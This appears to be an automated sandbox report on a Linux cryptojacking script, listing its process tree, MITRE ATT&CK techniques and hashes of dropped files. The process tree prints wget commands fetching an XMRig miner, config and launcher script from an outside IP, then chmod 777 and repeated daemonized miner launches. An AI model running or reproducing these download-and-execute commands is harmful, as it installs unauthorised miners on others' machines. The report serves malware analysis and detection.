/tmp/8f492296456c0f28341431bc48d294607ab2cecdecb74ae69d79fc11c242edfb.sh/tmp/8f492296456c0f28341431bc48d294607ab2cecdecb74ae69d79fc11c242edfb.sh1⤵PID:1520
-
/usr/bin/wgetwget http://45.202.35.107/xmrigDaemon2⤵
- Writes file to tmp directory
PID:1521
-
-
/usr/bin/wgetwget http://45.202.35.107/xmrigMiner2⤵
- Writes file to tmp directory
PID:1525
-
-
/usr/bin/wgetwget http://45.202.35.107/config.json2⤵
- Writes file to tmp directory
PID:1526
-
-
/usr/bin/wgetwget http://45.202.35.107/check.sh2⤵
- Writes file to tmp directory
PID:1527
-
-
/bin/chmodchmod 777 xmrigMiner2⤵
- File and Directory Permissions Modification
PID:1528
-
-
/bin/chmodchmod 777 xmrigDaemon2⤵
- File and Directory Permissions Modification
PID:1529
-
-
/bin/chmodchmod 777 check.sh2⤵
- File and Directory Permissions Modification
PID:1530
-
-
/tmp/check.sh./check.sh1⤵
- Executes dropped EXE
PID:1531 -
/usr/bin/pgreppgrep -f xmrigDaemon2⤵
- Reads runtime system information
PID:1532
-
-
/tmp/xmrigDaemon./xmrigDaemon2⤵
- Executes dropped EXE
PID:1533 -
/bin/shsh -c "\"./xmrigMiner\" --daemonized"3⤵PID:1534
-
/tmp/xmrigMiner./xmrigMiner --daemonized4⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Reads runtime system information
- Writes file to tmp directory
PID:1535
-
-
-
/bin/shsh -c "\"./xmrigMiner\" --daemonized"3⤵PID:1542
-
/tmp/xmrigMiner./xmrigMiner --daemonized4⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
- Writes file to tmp directory
PID:1543
-
-
-
/bin/shsh -c "\"./xmrigMiner\" --daemonized"3⤵PID:1550
-
/tmp/xmrigMiner./xmrigMiner --daemonized4⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
PID:1551
-
-
-
/bin/shsh -c "\"./xmrigMiner\" --daemonized"3⤵PID:1558
-
/tmp/xmrigMiner./xmrigMiner --daemonized4⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
- Writes file to tmp directory
PID:1559
-
-
-
/bin/shsh -c "\"./xmrigMiner\" --daemonized"3⤵PID:1566
-
/tmp/xmrigMiner./xmrigMiner --daemonized4⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
- Writes file to tmp directory
PID:1567
-
-
-
/bin/shsh -c "\"./xmrigMiner\" --daemonized"3⤵PID:1574
-
/tmp/xmrigMiner./xmrigMiner --daemonized4⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
- Writes file to tmp directory
PID:1575
-
-
-
/bin/shsh -c "\"./xmrigMiner\" --daemonized"3⤵PID:1582
-
/tmp/xmrigMiner./xmrigMiner --daemonized4⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Writes file to tmp directory
PID:1583
-
-
-
/bin/shsh -c "\"./xmrigMiner\" --daemonized"3⤵PID:1590
-
/tmp/xmrigMiner./xmrigMiner --daemonized4⤵
- Executes dropped EXE
- Reads hardware information
- Checks CPU configuration
- Enumerates kernel/hardware configuration
- Reads runtime system information
- Writes file to tmp directory
PID:1591
-
-
-
/bin/shsh -c "\"./xmrigMiner\" --daemonized"3⤵PID:1598
-
/tmp/xmrigMiner./xmrigMiner --daemonized4⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
- Writes file to tmp directory
PID:1599
-
-
-
/bin/shsh -c "\"./xmrigMiner\" --daemonized"3⤵PID:1606
-
/tmp/xmrigMiner./xmrigMiner --daemonized4⤵
- Executes dropped EXE
- Reads hardware information
- Checks CPU configuration
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
PID:1607
-
-
-
/bin/shsh -c "\"./xmrigMiner\" --daemonized"3⤵PID:1614
-
/tmp/xmrigMiner./xmrigMiner --daemonized4⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
PID:1615
-
-
-
/bin/shsh -c "\"./xmrigMiner\" --daemonized"3⤵PID:1622
-
/tmp/xmrigMiner./xmrigMiner --daemonized4⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
- Writes file to tmp directory
PID:1623
-
-
-
/bin/shsh -c "\"./xmrigMiner\" --daemonized"3⤵PID:1630
-
/tmp/xmrigMiner./xmrigMiner --daemonized4⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Writes file to tmp directory
PID:1631
-
-
-
/bin/shsh -c "\"./xmrigMiner\" --daemonized"3⤵PID:1640
-
/tmp/xmrigMiner./xmrigMiner --daemonized4⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
PID:1641
-
-
-
/bin/shsh -c "\"./xmrigMiner\" --daemonized"3⤵PID:1648
-
/tmp/xmrigMiner./xmrigMiner --daemonized4⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
PID:1649
-
-
-
/bin/shsh -c "\"./xmrigMiner\" --daemonized"3⤵PID:1656
-
/tmp/xmrigMiner./xmrigMiner --daemonized4⤵
- Executes dropped EXE
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
- Writes file to tmp directory
PID:1657
-
-
-
/bin/shsh -c "\"./xmrigMiner\" --daemonized"3⤵PID:1664
-
/tmp/xmrigMiner./xmrigMiner --daemonized4⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
- Writes file to tmp directory
PID:1665
-
-
-
/bin/shsh -c "\"./xmrigMiner\" --daemonized"3⤵PID:1672
-
/tmp/xmrigMiner./xmrigMiner --daemonized4⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
PID:1673
-
-
-
/bin/shsh -c "\"./xmrigMiner\" --daemonized"3⤵PID:1680
-
/tmp/xmrigMiner./xmrigMiner --daemonized4⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Enumerates kernel/hardware configuration
- Reads runtime system information
- Writes file to tmp directory
PID:1681
-
-
-
/bin/shsh -c "\"./xmrigMiner\" --daemonized"3⤵PID:1688
-
/tmp/xmrigMiner./xmrigMiner --daemonized4⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Checks CPU configuration
- Reads CPU attributes
- Writes file to tmp directory
PID:1689
-
-
-
/bin/shsh -c "\"./xmrigMiner\" --daemonized"3⤵PID:1696
-
/tmp/xmrigMiner./xmrigMiner --daemonized4⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
- Writes file to tmp directory
PID:1697
-
-
-
/bin/shsh -c "\"./xmrigMiner\" --daemonized"3⤵PID:1704
-
/tmp/xmrigMiner./xmrigMiner --daemonized4⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
- Writes file to tmp directory
PID:1705
-
-
-
/bin/shsh -c "\"./xmrigMiner\" --daemonized"3⤵PID:1712
-
/tmp/xmrigMiner./xmrigMiner --daemonized4⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
- Writes file to tmp directory
PID:1713
-
-
-
/bin/shsh -c "\"./xmrigMiner\" --daemonized"3⤵PID:1720
-
/tmp/xmrigMiner./xmrigMiner --daemonized4⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
PID:1721
-
-
-
/bin/shsh -c "\"./xmrigMiner\" --daemonized"3⤵PID:1728
-
/tmp/xmrigMiner./xmrigMiner --daemonized4⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
PID:1729
-
-
-
/bin/shsh -c "\"./xmrigMiner\" --daemonized"3⤵PID:1736
-
/tmp/xmrigMiner./xmrigMiner --daemonized4⤵
- Executes dropped EXE
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Writes file to tmp directory
PID:1737
-
-
-
/bin/shsh -c "\"./xmrigMiner\" --daemonized"3⤵PID:1744
-
/tmp/xmrigMiner./xmrigMiner --daemonized4⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
PID:1745
-
-
-
/bin/shsh -c "\"./xmrigMiner\" --daemonized"3⤵PID:1752
-
/tmp/xmrigMiner./xmrigMiner --daemonized4⤵
- Executes dropped EXE
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
PID:1753
-
-
-
/bin/shsh -c "\"./xmrigMiner\" --daemonized"3⤵PID:1760
-
/tmp/xmrigMiner./xmrigMiner --daemonized4⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Checks CPU configuration
- Reads CPU attributes
- Reads runtime system information
- Writes file to tmp directory
PID:1761
-
-
-
/bin/shsh -c "\"./xmrigMiner\" --daemonized"3⤵PID:1768
-
/tmp/xmrigMiner./xmrigMiner --daemonized4⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
PID:1769
-
-
-
/bin/shsh -c "\"./xmrigMiner\" --daemonized"3⤵PID:1776
-
/tmp/xmrigMiner./xmrigMiner --daemonized4⤵
- Executes dropped EXE
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
PID:1777
-
-
-
/bin/shsh -c "\"./xmrigMiner\" --daemonized"3⤵PID:1784
-
/tmp/xmrigMiner./xmrigMiner --daemonized4⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
PID:1785
-
-
-
/bin/shsh -c "\"./xmrigMiner\" --daemonized"3⤵PID:1792
-
/tmp/xmrigMiner./xmrigMiner --daemonized4⤵
- Executes dropped EXE
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
PID:1793
-
-
-
/bin/shsh -c "\"./xmrigMiner\" --daemonized"3⤵PID:1800
-
/tmp/xmrigMiner./xmrigMiner --daemonized4⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Checks CPU configuration
- Reads CPU attributes
- Writes file to tmp directory
PID:1801
-
-
-
/bin/shsh -c "\"./xmrigMiner\" --daemonized"3⤵PID:1808
-
/tmp/xmrigMiner./xmrigMiner --daemonized4⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
PID:1809
-
-
-
/bin/shsh -c "\"./xmrigMiner\" --daemonized"3⤵PID:1816
-
/tmp/xmrigMiner./xmrigMiner --daemonized4⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Enumerates kernel/hardware configuration
- Reads runtime system information
- Writes file to tmp directory
PID:1817
-
-
-
/bin/shsh -c "\"./xmrigMiner\" --daemonized"3⤵PID:1824
-
/tmp/xmrigMiner./xmrigMiner --daemonized4⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
- Writes file to tmp directory
PID:1825
-
-
-
/bin/shsh -c "\"./xmrigMiner\" --daemonized"3⤵PID:1832
-
/tmp/xmrigMiner./xmrigMiner --daemonized4⤵
- Executes dropped EXE
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
- Writes file to tmp directory
PID:1833
-
-
-
/bin/shsh -c "\"./xmrigMiner\" --daemonized"3⤵PID:1840
-
/tmp/xmrigMiner./xmrigMiner --daemonized4⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
- Writes file to tmp directory
PID:1841
-
-
-
/bin/shsh -c "\"./xmrigMiner\" --daemonized"3⤵PID:1848
-
/tmp/xmrigMiner./xmrigMiner --daemonized4⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
- Writes file to tmp directory
PID:1849
-
-
-
/bin/shsh -c "\"./xmrigMiner\" --daemonized"3⤵PID:1856
-
/tmp/xmrigMiner./xmrigMiner --daemonized4⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
- Writes file to tmp directory
PID:1857
-
-
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
2System Checks
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
823B
MD53284592438c4df2dd14b74cec93c6015
SHA11662db32dd1b9ebcf38b20b8d6c2212912bf250e
SHA256b456d2835bda6f651883e81201e12e4b7fbb9ad644f17016fbf5553c155cf958
SHA51254af1b77dcad7a64a5e5abfae973770e3702dad5f6c3a4738e06ae1cb2a677dea08bb3360a68a8ae9a0dec3d35355a7ecc0351bbe686f9f3ae55abfcc92b0af2
-
Filesize
39KB
MD568ca711184451bc4e72c5b615d4a8b5c
SHA1d9a0f0fd8bdb37fdea7596ab52be43c254c81790
SHA256ed2e669b35586da965d1579844463bcb26e73bcc38152f34bbae1529ea2330d9
SHA512e6baa4fe37954cc820c8700f1a153865cee4b5d02c5caad295148c0e45714ed5cb3e42ca5c494ca9feb8e32f2ae550b2c2ea7e9e517fcb6d7857ef5e9bc3b851
-
Filesize
629KB
MD5bd98e7c9ca771be14cd9229bc1636732
SHA14a4723378eb0268f4659f1b1d3f2be5f74e20b87
SHA2560ea2d73e47b8642b24371be112fb04e455bc8577fa17911bd17793887cedeb7e
SHA512cd641b0325242bfec608fae6d09c716d2a6519bf2aafeef025e7330c2c1e1c63d90b1b15307adcfa3d3fd4ccaff4003d4facc68038283f7b47ecdfd631380608
-
Filesize
7.9MB
MD598d1e494adf9aa586221feeaa74aaf8a
SHA12cbc1044034e21dbaaea4afce3aef772aa468041
SHA256c58301ea640b622c52599d530e2a4d302025d4b23dca1b78f61405655733207f
SHA512fdd937825c461ce010697b2bb44c6e78bdc7be682c49c4339719a1d2d4c3f38930dd8a0277461ce93f4cc80474a22836a20877da447cb8f8b73ce8182a2a0791